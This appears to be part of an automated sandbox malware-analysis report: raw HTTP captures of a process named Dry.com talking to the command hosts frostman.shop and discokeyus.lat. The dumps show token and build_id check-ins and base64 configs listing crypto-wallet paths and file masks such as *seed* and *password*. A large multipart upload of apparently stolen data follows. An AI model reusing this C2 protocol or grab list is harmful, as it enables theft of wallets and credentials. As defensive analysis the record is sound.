                                                                                                                                                                                                                                                                          2024-12-21 00:15:37 UTC16355OUTData Raw: 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41
                                                                                                                                                                                                                                                                          Data Ascii: AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
                                                                                                                                                                                                                                                                          2024-12-21 00:15:45 UTC158INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                          Server: nginx
                                                                                                                                                                                                                                                                          Date: Sat, 21 Dec 2024 00:15:44 GMT
                                                                                                                                                                                                                                                                          Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                                                          Transfer-Encoding: chunked
                                                                                                                                                                                                                                                                          Connection: close


                                                                                                                                                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                          31192.168.2.550120116.203.12.1144434952C:\Users\user\AppData\Local\Temp\245347\Dry.com
                                                                                                                                                                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                          2024-12-21 00:15:39 UTC325OUTPOST / HTTP/1.1
                                                                                                                                                                                                                                                                          Content-Type: multipart/form-data; boundary=----7QQIEKNGVAAAAIE3O8Q1
                                                                                                                                                                                                                                                                          User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/128.0.0.0 Safari/537.36 OPR/116.0.0.0
                                                                                                                                                                                                                                                                          Host: frostman.shop
                                                                                                                                                                                                                                                                          Content-Length: 331
                                                                                                                                                                                                                                                                          Connection: Keep-Alive
                                                                                                                                                                                                                                                                          Cache-Control: no-cache
                                                                                                                                                                                                                                                                          2024-12-21 00:15:39 UTC331OUTData Raw: 2d 2d 2d 2d 2d 2d 37 51 51 49 45 4b 4e 47 56 41 41 41 41 49 45 33 4f 38 51 31 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 36 36 34 34 65 38 36 38 30 38 66 37 34 63 61 31 31 39 66 37 61 36 32 34 33 36 38 34 65 61 62 32 0d 0a 2d 2d 2d 2d 2d 2d 37 51 51 49 45 4b 4e 47 56 41 41 41 41 49 45 33 4f 38 51 31 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 5f 69 64 22 0d 0a 0d 0a 64 61 64 62 35 65 35 31 65 62 65 33 62 61 31 32 61 66 62 37 66 62 65 36 32 34 64 31 32 61 32 62 0d 0a 2d 2d 2d 2d 2d 2d 37 51 51 49 45 4b 4e 47 56 41 41 41 41 49 45 33 4f 38 51 31 0d 0a 43 6f 6e 74
                                                                                                                                                                                                                                                                          Data Ascii: ------7QQIEKNGVAAAAIE3O8Q1Content-Disposition: form-data; name="token"6644e86808f74ca119f7a6243684eab2------7QQIEKNGVAAAAIE3O8Q1Content-Disposition: form-data; name="build_id"dadb5e51ebe3ba12afb7fbe624d12a2b------7QQIEKNGVAAAAIE3O8Q1Cont
                                                                                                                                                                                                                                                                          2024-12-21 00:15:40 UTC158INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                          Server: nginx
                                                                                                                                                                                                                                                                          Date: Sat, 21 Dec 2024 00:15:39 GMT
                                                                                                                                                                                                                                                                          Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                                                          Transfer-Encoding: chunked
                                                                                                                                                                                                                                                                          Connection: close
                                                                                                                                                                                                                                                                          2024-12-21 00:15:40 UTC2228INData Raw: 38 61 38 0d 0a 51 6d 6c 30 59 32 39 70 62 69 42 44 62 33 4a 6c 66 44 46 38 58 45 4a 70 64 47 4e 76 61 57 35 63 64 32 46 73 62 47 56 30 63 31 78 38 64 32 46 73 62 47 56 30 4c 6d 52 68 64 48 77 78 66 45 4a 70 64 47 4e 76 61 57 34 67 51 32 39 79 5a 53 42 50 62 47 52 38 4d 58 78 63 51 6d 6c 30 59 32 39 70 62 6c 78 38 4b 6e 64 68 62 47 78 6c 64 43 6f 75 5a 47 46 30 66 44 42 38 52 47 39 6e 5a 57 4e 76 61 57 35 38 4d 58 78 63 52 47 39 6e 5a 57 4e 76 61 57 35 63 66 43 70 33 59 57 78 73 5a 58 51 71 4c 6d 52 68 64 48 77 77 66 46 4a 68 64 6d 56 75 49 45 4e 76 63 6d 56 38 4d 58 78 63 55 6d 46 32 5a 57 35 63 66 43 70 33 59 57 78 73 5a 58 51 71 4c 6d 52 68 64 48 77 77 66 45 52 68 5a 57 52 68 62 48 56 7a 49 45 31 68 61 57 35 75 5a 58 52 38 4d 58 78 63 52 47 46 6c 5a 47
                                                                                                                                                                                                                                                                          Data Ascii: 8a8Qml0Y29pbiBDb3JlfDF8XEJpdGNvaW5cd2FsbGV0c1x8d2FsbGV0LmRhdHwxfEJpdGNvaW4gQ29yZSBPbGR8MXxcQml0Y29pblx8KndhbGxldCouZGF0fDB8RG9nZWNvaW58MXxcRG9nZWNvaW5cfCp3YWxsZXQqLmRhdHwwfFJhdmVuIENvcmV8MXxcUmF2ZW5cfCp3YWxsZXQqLmRhdHwwfERhZWRhbHVzIE1haW5uZXR8MXxcRGFlZG


                                                                                                                                                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                          32192.168.2.550133116.203.12.1144434952C:\Users\user\AppData\Local\Temp\245347\Dry.com
                                                                                                                                                                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                          2024-12-21 00:15:41 UTC325OUTPOST / HTTP/1.1
                                                                                                                                                                                                                                                                          Content-Type: multipart/form-data; boundary=----AAS00R1VAI58YM7QQ9ZM
                                                                                                                                                                                                                                                                          User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/128.0.0.0 Safari/537.36 OPR/116.0.0.0
                                                                                                                                                                                                                                                                          Host: frostman.shop
                                                                                                                                                                                                                                                                          Content-Length: 331
                                                                                                                                                                                                                                                                          Connection: Keep-Alive
                                                                                                                                                                                                                                                                          Cache-Control: no-cache
                                                                                                                                                                                                                                                                          2024-12-21 00:15:41 UTC331OUTData Raw: 2d 2d 2d 2d 2d 2d 41 41 53 30 30 52 31 56 41 49 35 38 59 4d 37 51 51 39 5a 4d 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 36 36 34 34 65 38 36 38 30 38 66 37 34 63 61 31 31 39 66 37 61 36 32 34 33 36 38 34 65 61 62 32 0d 0a 2d 2d 2d 2d 2d 2d 41 41 53 30 30 52 31 56 41 49 35 38 59 4d 37 51 51 39 5a 4d 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 5f 69 64 22 0d 0a 0d 0a 64 61 64 62 35 65 35 31 65 62 65 33 62 61 31 32 61 66 62 37 66 62 65 36 32 34 64 31 32 61 32 62 0d 0a 2d 2d 2d 2d 2d 2d 41 41 53 30 30 52 31 56 41 49 35 38 59 4d 37 51 51 39 5a 4d 0d 0a 43 6f 6e 74
                                                                                                                                                                                                                                                                          Data Ascii: ------AAS00R1VAI58YM7QQ9ZMContent-Disposition: form-data; name="token"6644e86808f74ca119f7a6243684eab2------AAS00R1VAI58YM7QQ9ZMContent-Disposition: form-data; name="build_id"dadb5e51ebe3ba12afb7fbe624d12a2b------AAS00R1VAI58YM7QQ9ZMCont
                                                                                                                                                                                                                                                                          2024-12-21 00:15:42 UTC158INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                          Server: nginx
                                                                                                                                                                                                                                                                          Date: Sat, 21 Dec 2024 00:15:42 GMT
                                                                                                                                                                                                                                                                          Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                                                          Transfer-Encoding: chunked
                                                                                                                                                                                                                                                                          Connection: close
                                                                                                                                                                                                                                                                          2024-12-21 00:15:42 UTC1316INData Raw: 35 31 38 0d 0a 5a 47 39 6a 64 57 31 6c 62 6e 52 7a 66 43 56 45 54 30 4e 56 54 55 56 4f 56 46 4d 6c 58 48 77 71 4c 6e 52 34 64 43 77 71 4c 6e 70 70 63 43 77 71 4c 6e 4a 68 63 69 77 71 4c 6d 52 68 64 43 77 71 64 32 46 73 62 47 56 30 4b 69 34 71 4c 43 70 69 61 58 52 6a 62 32 6c 75 4b 69 34 71 4c 43 70 69 64 47 4d 71 4c 69 6f 73 4b 6e 4e 6c 5a 57 51 71 4c 69 6f 73 4b 6d 4e 79 65 58 42 30 62 79 6f 75 4b 69 77 71 59 57 52 74 61 57 34 71 4c 69 6f 73 4b 6e 5a 68 62 47 6c 6b 4b 69 34 71 4c 43 70 77 59 58 4e 7a 64 32 39 79 5a 43 6f 75 4b 69 77 71 62 57 39 75 5a 58 6b 71 4c 69 6f 73 4b 6e 4a 6b 63 43 6f 75 4b 69 77 71 63 32 56 79 64 6d 56 79 4b 69 34 71 4c 43 70 6d 62 33 4a 31 62 53 6f 75 4b 69 77 71 63 32 68 76 63 43 6f 75 4b 69 77 71 62 57 56 30 59 57 31 68 63 32
                                                                                                                                                                                                                                                                          Data Ascii: 518ZG9jdW1lbnRzfCVET0NVTUVOVFMlXHwqLnR4dCwqLnppcCwqLnJhciwqLmRhdCwqd2FsbGV0Ki4qLCpiaXRjb2luKi4qLCpidGMqLiosKnNlZWQqLiosKmNyeXB0byouKiwqYWRtaW4qLiosKnZhbGlkKi4qLCpwYXNzd29yZCouKiwqbW9uZXkqLiosKnJkcCouKiwqc2VydmVyKi4qLCpmb3J1bSouKiwqc2hvcCouKiwqbWV0YW1hc2


                                                                                                                                                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                          33192.168.2.550148116.203.12.1144434952C:\Users\user\AppData\Local\Temp\245347\Dry.com
                                                                                                                                                                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                          2024-12-21 00:15:47 UTC327OUTPOST / HTTP/1.1
                                                                                                                                                                                                                                                                          Content-Type: multipart/form-data; boundary=----KNG4E3OZMOZUAAASJ5PH
                                                                                                                                                                                                                                                                          User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/128.0.0.0 Safari/537.36 OPR/116.0.0.0
                                                                                                                                                                                                                                                                          Host: frostman.shop
                                                                                                                                                                                                                                                                          Content-Length: 98109
                                                                                                                                                                                                                                                                          Connection: Keep-Alive
                                                                                                                                                                                                                                                                          Cache-Control: no-cache
                                                                                                                                                                                                                                                                          2024-12-21 00:15:47 UTC16355OUTData Raw: 2d 2d 2d 2d 2d 2d 4b 4e 47 34 45 33 4f 5a 4d 4f 5a 55 41 41 41 53 4a 35 50 48 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 36 36 34 34 65 38 36 38 30 38 66 37 34 63 61 31 31 39 66 37 61 36 32 34 33 36 38 34 65 61 62 32 0d 0a 2d 2d 2d 2d 2d 2d 4b 4e 47 34 45 33 4f 5a 4d 4f 5a 55 41 41 41 53 4a 35 50 48 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 5f 69 64 22 0d 0a 0d 0a 64 61 64 62 35 65 35 31 65 62 65 33 62 61 31 32 61 66 62 37 66 62 65 36 32 34 64 31 32 61 32 62 0d 0a 2d 2d 2d 2d 2d 2d 4b 4e 47 34 45 33 4f 5a 4d 4f 5a 55 41 41 41 53 4a 35 50 48 0d 0a 43 6f 6e 74
                                                                                                                                                                                                                                                                          Data Ascii: ------KNG4E3OZMOZUAAASJ5PHContent-Disposition: form-data; name="token"6644e86808f74ca119f7a6243684eab2------KNG4E3OZMOZUAAASJ5PHContent-Disposition: form-data; name="build_id"dadb5e51ebe3ba12afb7fbe624d12a2b------KNG4E3OZMOZUAAASJ5PHCont
                                                                                                                                                                                                                                                                          2024-12-21 00:15:47 UTC16355OUTData Raw: 4b 42 68 32 70 4b 58 46 4a 69 67 59 6c 4a 54 71 54 46 49 42 4b 53 6c 36 30 6c 41 78 4f 39 4a 32 70 31 49 52 51 55 49 61 53 6e 47 6b 49 6f 47 4e 36 47 69 6c 4e 4a 31 6f 41 54 72 53 45 55 37 47 4b 61 52 51 55 46 49 65 52 53 34 70 50 6f 4d 55 41 46 4a 53 34 35 7a 52 51 4d 62 52 53 30 6e 66 38 41 72 51 4d 51 38 69 67 38 69 6c 6f 6f 47 4e 7a 2b 49 70 4f 6c 4f 50 65 6d 34 34 6f 47 48 34 55 64 66 2f 72 30 76 4f 50 57 6b 50 50 74 51 4d 51 38 30 59 7a 53 2f 70 53 59 7a 2f 68 51 41 6e 34 66 6e 52 31 6f 70 54 51 4d 62 6a 6a 76 53 64 71 63 66 65 6b 4e 4d 42 4b 43 50 57 6a 70 51 66 61 6b 4d 54 2f 4a 70 42 2b 4e 4f 50 4e 4e 70 67 67 7a 36 59 6f 50 35 2f 57 6a 4e 48 62 36 65 74 41 77 36 34 36 30 68 6f 7a 67 65 39 4b 53 4d 30 41 49 65 6e 53 6b 78 53 39 52 36 30 59 35 6f
                                                                                                                                                                                                                                                                          Data Ascii: KBh2pKXFJigYlJTqTFIBKSl60lAxO9J2p1IRQUIaSnGkIoGN6GilNJ1oATrSEU7GKaRQUFIeRS4pPoMUAFJS45zRQMbRS0nf8ArQMQ8ig8ilooGNz+IpOlOPem44oGH4Udf/r0vOPWkPPtQMQ80YzS/pSYz/hQAn4fnR1opTQMbjjvSdqcfekNMBKCPWjpQfakMT/JpB+NOPNNpggz6YoP5/WjNHb6etAw6460hozge9KSM0AIenSkxS9R60Y5o
                                                                                                                                                                                                                                                                          2024-12-21 00:15:47 UTC16355OUTData Raw: 36 6a 6d 76 4c 78 38 4a 54 77 74 53 4d 64 37 4d 2b 62 6f 4e 4b 72 46 76 75 55 70 50 6e 58 48 66 74 58 57 2b 4b 43 59 50 44 50 68 69 32 69 79 4c 63 32 6e 6d 6b 44 6f 58 49 42 62 38 51 53 66 7a 72 6b 4e 31 64 68 70 46 7a 5a 65 49 2f 44 30 65 67 58 31 79 6c 74 65 57 7a 46 72 4b 65 51 2f 4b 32 65 71 45 2f 35 37 65 6c 66 47 5a 54 57 70 30 4d 56 47 64 54 59 2b 79 6f 34 75 70 4c 43 76 42 74 36 58 75 76 58 71 76 6e 2f 57 35 79 57 61 36 48 77 52 50 4c 46 34 76 73 52 45 66 76 73 79 4d 50 56 53 70 7a 2f 6a 2b 46 4d 6d 38 44 2b 49 34 5a 2f 4b 2f 73 35 33 35 77 48 52 31 4b 6e 38 63 38 66 6a 58 54 65 48 74 45 6a 38 4b 7a 6d 35 31 43 57 4a 39 57 65 4d 2b 54 62 52 6e 64 35 53 6e 71 7a 66 79 2f 78 37 66 57 35 6a 6d 47 47 6f 34 57 63 35 53 54 56 6d 5a 34 58 44 56 70 56 6f
                                                                                                                                                                                                                                                                          Data Ascii: 6jmvLx8JTwtSMd7M+boNKrFvuUpPnXHftXW+KCYPDPhi2iyLc2nmkDoXIBb8QSfzrkN1dhpFzZeI/D0egX1ylteWzFrKeQ/K2eqE/57elfGZTWp0MVGdTY+yo4upLCvBt6XuvXqvn/W5yWa6HwRPLF4vsREfvsyMPVSpz/j+FMm8D+I4Z/K/s535wHR1Kn8c8fjXTeHtEj8Kzm51CWJ9WeM+TbRnd5Snqzfy/x7fW5jmGGo4Wc5STVmZ4XDVpVo
                                                                                                                                                                                                                                                                          2024-12-21 00:15:47 UTC16355OUTData Raw: 33 36 30 77 2f 6d 50 57 6e 74 79 54 55 5a 50 57 76 59 68 38 4b 4f 69 4f 77 30 38 47 6d 47 6e 63 39 4f 31 4e 4a 35 6f 62 4e 45 4a 6e 67 34 70 75 66 78 70 54 30 70 70 36 35 71 47 55 67 7a 54 63 2b 6c 42 50 50 65 6b 49 71 53 68 44 36 30 6e 4e 4b 65 6c 4a 79 50 77 71 57 55 68 42 31 35 70 44 37 30 6f 35 6f 49 46 53 4d 54 39 4b 53 6a 71 66 65 67 6e 2f 41 43 4b 51 78 44 7a 53 47 6a 46 4a 6d 6b 4f 77 64 54 2f 53 6b 50 54 4e 48 2b 65 61 4f 31 49 6f 39 41 6f 6f 6f 72 41 2b 55 43 69 75 74 74 50 42 61 33 56 6c 42 63 66 32 6b 71 65 62 47 72 37 66 4a 4a 78 6b 5a 78 31 71 4f 66 77 76 70 6c 72 4d 30 4e 78 34 6d 73 49 5a 56 78 6d 4f 55 71 72 44 49 79 4d 67 74 6e 6f 61 38 65 4f 62 78 6b 37 4b 44 5a 39 46 4c 68 79 70 46 58 64 52 49 35 61 69 75 6c 2f 34 52 2f 52 66 2b 68 73
                                                                                                                                                                                                                                                                          Data Ascii: 360w/mPWntyTUZPWvYh8KOiOw08GmGnc9O1NJ5obNEJng4pufxpT0pp65qGUgzTc+lBPPekIqShD60nNKelJyPwqWUhB15pD70o5oIFSMT9KSjqfegn/ACKQxDzSGjFJmkOwdT/SkPTNH+eaO1Io9AooorA+UCiuttPBa3VlBcf2kqebGr7fJJxkZx1qOfwvplrM0Nx4msIZVxmOUqrDIyMgtnoa8eObxk7KDZ9FLhypFXdRI5aiul/4R/Rf+hs
                                                                                                                                                                                                                                                                          2024-12-21 00:15:47 UTC16355OUTData Raw: 55 70 70 4b 42 68 52 52 53 55 41 46 46 46 4a 51 4d 4b 4b 4b 53 67 59 55 55 55 47 67 41 70 4b 57 6b 6f 47 49 61 4b 44 52 51 41 55 6c 4c 53 55 44 43 6b 70 61 53 6d 41 47 6b 70 61 53 67 59 55 55 55 55 44 45 6f 6f 6f 6f 41 4b 53 6c 70 44 51 4d 4b 54 4e 4c 53 55 77 43 69 69 69 6b 41 6c 46 46 46 4d 59 6d 61 4b 57 6b 70 44 46 70 4b 4b 44 51 41 63 55 6c 46 46 41 78 4b 4b 4b 53 6d 4d 57 6b 7a 7a 53 55 55 58 41 57 69 6b 70 4f 31 41 78 63 30 55 55 32 67 64 68 63 30 6d 63 30 45 30 30 6e 76 56 44 73 4f 4e 4a 53 5a 70 70 49 48 66 46 4f 77 37 44 69 65 61 51 6e 46 4d 61 51 44 33 71 4d 79 4e 37 43 6d 55 6f 6b 35 62 38 4b 59 5a 46 48 76 55 4a 50 50 4e 4e 4a 35 6f 75 55 6f 45 70 6c 4a 48 47 41 4b 6a 4c 45 39 7a 2b 4e 4e 4a 39 36 61 54 53 35 69 31 45 64 75 4f 54 53 45 35 70
                                                                                                                                                                                                                                                                          Data Ascii: UppKBhRRSUAFFFJQMKKKSgYUUUGgApKWkoGIaKDRQAUlLSUDCkpaSmAGkpaSgYUUUUDEooooAKSlpDQMKTNLSUwCiiikAlFFFMYmaKWkpDFpKKDQAcUlFFAxKKKSmMWkzzSUUXAWikpO1Axc0UU2gdhc0mc0E00nvVDsONJSZppIHfFOw7DieaQnFMaQD3qMyN7CmUok5b8KYZFHvUJPPNNJ5ouUoEplJHGAKjLE9z+NNJ96aTS5i1EduOTSE5p
                                                                                                                                                                                                                                                                          2024-12-21 00:15:47 UTC16334OUTData Raw: 55 6c 41 43 30 6d 61 4b 44 51 41 55 55 55 55 41 46 46 46 46 41 42 52 52 52 51 41 55 55 55 55 77 43 69 6a 50 74 53 5a 70 44 46 2f 47 6b 70 4b 4b 59 43 35 70 43 61 4b 4b 51 78 4b 4b 4b 4b 41 43 69 69 6b 4e 41 42 52 52 52 51 4d 4b 53 69 69 67 41 6f 6f 70 4f 39 41 77 6f 6f 6f 6f 41 44 30 70 4b 55 30 6c 41 77 70 4b 57 6b 4e 41 42 52 52 51 61 42 69 55 55 55 55 44 43 6b 6f 6f 70 67 46 4a 53 6d 6b 6f 47 46 4a 51 61 4b 41 43 6b 70 61 53 67 41 70 44 53 30 68 6f 47 46 4a 53 30 6c 41 77 70 44 53 30 6c 41 77 6f 4e 46 4a 54 41 4b 53 6c 70 4b 42 67 65 6c 4a 53 30 6c 41 77 70 4b 57 6b 6f 41 4b 53 6c 4e 4a 51 4d 53 69 69 69 67 59 6c 46 46 46 41 78 4b 4b 4b 53 67 41 70 4b 44 52 51 4d 4b 53 69 69 67 59 55 6c 46 42 70 6a 45 70 44 53 30 6c 41 77 70 4b 57 6b 6f 47 46 4a 53 6d
                                                                                                                                                                                                                                                                          Data Ascii: UlAC0maKDQAUUUUAFFFFABRRRQAUUUUwCijPtSZpDF/GkpKKYC5pCaKKQxKKKKACiikNABRRRQMKSiigAoopO9AwooooAD0pKU0lAwpKWkNABRRQaBiUUUUDCkoopgFJSmkoGFJQaKACkpaSgApDS0hoGFJS0lAwpDS0lAwoNFJTAKSlpKBgelJS0lAwpKWkoAKSlNJQMSiiigYlFFFAxKKKSgApKDRQMKSiigYUlFBpjEpDS0lAwpKWkoGFJSm
                                                                                                                                                                                                                                                                          2024-12-21 00:15:48 UTC158INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                          Server: nginx
                                                                                                                                                                                                                                                                          Date: Sat, 21 Dec 2024 00:15:48 GMT
                                                                                                                                                                                                                                                                          Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                                                          Transfer-Encoding: chunked
                                                                                                                                                                                                                                                                          Connection: close
                                                                                                                                                                                                                                                                          2024-12-21 00:15:48 UTC12INData Raw: 32 0d 0a 6f 6b 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                                          Data Ascii: 2ok0


                                                                                                                                                                                                                                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                                                                                                          34192.168.2.550151172.67.197.170443
                                                                                                                                                                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                          2024-12-21 00:15:51 UTC261OUTPOST /api HTTP/1.1
                                                                                                                                                                                                                                                                          Connection: Keep-Alive
                                                                                                                                                                                                                                                                          Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
                                                                                                                                                                                                                                                                          Content-Length: 8
                                                                                                                                                                                                                                                                          Host: discokeyus.lat
                                                                                                                                                                                                                                                                          2024-12-21 00:15:51 UTC8OUTData Raw: 61 63 74 3d 6c 69 66 65
                                                                                                                                                                                                                                                                          Data Ascii: act=life
                                                                                                                                                                                                                                                                          2024-12-21 00:15:51 UTC1127INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                          Date: Sat, 21 Dec 2024 00:15:51 GMT
                                                                                                                                                                                                                                                                          Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                                                          Transfer-Encoding: chunked
                                                                                                                                                                                                                                                                          Connection: close
                                                                                                                                                                                                                                                                          Set-Cookie: PHPSESSID=hbfucfjkhvi5p0phf7e951drub; expires=Tue, 15 Apr 2025 18:02:30 GMT; Max-Age=9999999; path=/
                                                                                                                                                                                                                                                                          Expires: Thu, 19 Nov 1981 08:52:00 GMT
                                                                                                                                                                                                                                                                          Cache-Control: no-store, no-cache, must-revalidate
                                                                                                                                                                                                                                                                          Pragma: no-cache
                                                                                                                                                                                                                                                                          X-Frame-Options: DENY
                                                                                                                                                                                                                                                                          X-Content-Type-Options: nosniff
                                                                                                                                                                                                                                                                          X-XSS-Protection: 1; mode=block
                                                                                                                                                                                                                                                                          cf-cache-status: DYNAMIC
                                                                                                                                                                                                                                                                          vary: accept-encoding
                                                                                                                                                                                                                                                                          Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=ce6VLX4ImN%2BYUEfJcpNqF64QKyV6y245W91FxjyuopsaW3jn4Ws6Ynv3arIH3UOY01lxhL1ohjtgQlhnt%2By%2B%2BnwycvqGOPvpTRRwSKpd7tGYUTj8evuoREDpSW4YIHCOlQ%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                                                                                                                                                                                                                                          NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                                                                                                                                                          Server: cloudflare
                                                                                                                                                                                                                                                                          CF-RAY: 8f53ae19abcf0f3b-EWR
                                                                                                                                                                                                                                                                          alt-svc: h3=":443"; ma=86400
                                                                                                                                                                                                                                                                          server-timing: cfL4;desc="?proto=TCP&rtt=1513&min_rtt=1505&rtt_var=580&sent=5&recv=7&lost=0&retrans=0&sent_bytes=2831&recv_bytes=905&delivery_rate=1859872&cwnd=215&unsent_bytes=0&cid=3f75f4f2ca887c52&ts=748&x=0"
                                                                                                                                                                                                                                                                          2024-12-21 00:15:51 UTC7INData Raw: 32 0d 0a 6f 6b 0d 0a
                                                                                                                                                                                                                                                                          Data Ascii: 2ok
                                                                                                                                                                                                                                                                          2024-12-21 00:15:51 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                                          Data Ascii: 0


                                                                                                                                                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                          35192.168.2.550153116.203.12.1144434952C:\Users\user\AppData\Local\Temp\245347\Dry.com
                                                                                                                                                                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                          2024-12-21 00:15:51 UTC325OUTPOST / HTTP/1.1
                                                                                                                                                                                                                                                                          Content-Type: multipart/form-data; boundary=----7G4EUSR9RI58QQIWT0ZC
                                                                                                                                                                                                                                                                          User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/128.0.0.0 Safari/537.36 OPR/116.0.0.0
                                                                                                                                                                                                                                                                          Host: frostman.shop
                                                                                                                                                                                                                                                                          Content-Length: 331
                                                                                                                                                                                                                                                                          Connection: Keep-Alive
                                                                                                                                                                                                                                                                          Cache-Control: no-cache
                                                                                                                                                                                                                                                                          2024-12-21 00:15:51 UTC331OUTData Raw: 2d 2d 2d 2d 2d 2d 37 47 34 45 55 53 52 39 52 49 35 38 51 51 49 57 54 30 5a 43 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 36 36 34 34 65 38 36 38 30 38 66 37 34 63 61 31 31 39 66 37 61 36 32 34 33 36 38 34 65 61 62 32 0d 0a 2d 2d 2d 2d 2d 2d 37 47 34 45 55 53 52 39 52 49 35 38 51 51 49 57 54 30 5a 43 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 5f 69 64 22 0d 0a 0d 0a 64 61 64 62 35 65 35 31 65 62 65 33 62 61 31 32 61 66 62 37 66 62 65 36 32 34 64 31 32 61 32 62 0d 0a 2d 2d 2d 2d 2d 2d 37 47 34 45 55 53 52 39 52 49 35 38 51 51 49 57 54 30 5a 43 0d 0a 43 6f 6e 74
                                                                                                                                                                                                                                                                          Data Ascii: ------7G4EUSR9RI58QQIWT0ZCContent-Disposition: form-data; name="token"6644e86808f74ca119f7a6243684eab2------7G4EUSR9RI58QQIWT0ZCContent-Disposition: form-data; name="build_id"dadb5e51ebe3ba12afb7fbe624d12a2b------7G4EUSR9RI58QQIWT0ZCCont
                                                                                                                                                                                                                                                                          2024-12-21 00:15:52 UTC158INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                          Server: nginx
                                                                                                                                                                                                                                                                          Date: Sat, 21 Dec 2024 00:15:52 GMT
